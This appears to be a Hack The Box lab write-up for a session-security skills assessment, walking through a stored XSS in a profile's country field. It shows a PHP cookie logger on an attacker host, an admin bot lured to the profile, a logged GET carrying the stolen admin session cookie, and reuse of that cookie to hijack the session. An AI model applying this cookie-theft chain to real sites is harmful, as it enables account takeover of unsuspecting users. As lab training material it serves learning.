Session Security
Skills Assessment
Test account credentials:
Email: heavycat106
Password: rocknrol
Create a log.php script to capture the cookie of user upon logging in to user public profile.
Perform XXS injection on the different input fields like county name phone and see which one is vulnerable to XXS.
Country input field is vulnerable to XSS injection
Click save and share
Usercookie:s%3Azgj5CVxjAQfFn87UYr_TMS71EcFqp4rO.KtaGjIBaYnO8yi6zU79xydo665QMnxqIW629bLzoBF0
Now we can use the API endpoint to make the Administrator visit public profile URL. http://minilab.htb.net/profile?email=julie.rogers@example.com
/submit-solution is the API endpoint as discussed at the start of the assessment
http://minilab.htb.net/submit-solution
To make admin visit url, key in the URL of the public profile Julie rogers to the URL parameter of the API endpoint with a PHP server running on port 8000
https://minilab.htb.net/submit-solution?url=http://minilab.htb.net/profile?email=julie.rogers@example.com
php -S 10.10.14.99:8000
GET /log.php?c=auth-session=s%3ADVBJKWUHWFsbsK_awzzui_EXuEyaQkUe.hLIQRFaEQFekQZoq2le6Wa%2Bd6fRVh%2FVxMRr%2B6iqFRa8
Admin session cookie:s:DVBJKWUHWFsbsK_awzzui_EXuEyaQkUe.hLIQRFaEQFekQZoq2le6Wa+d6fRVh/VxMRr+6iqFRa8
Use that cookie in current session via developer tools after URL decode
Last updated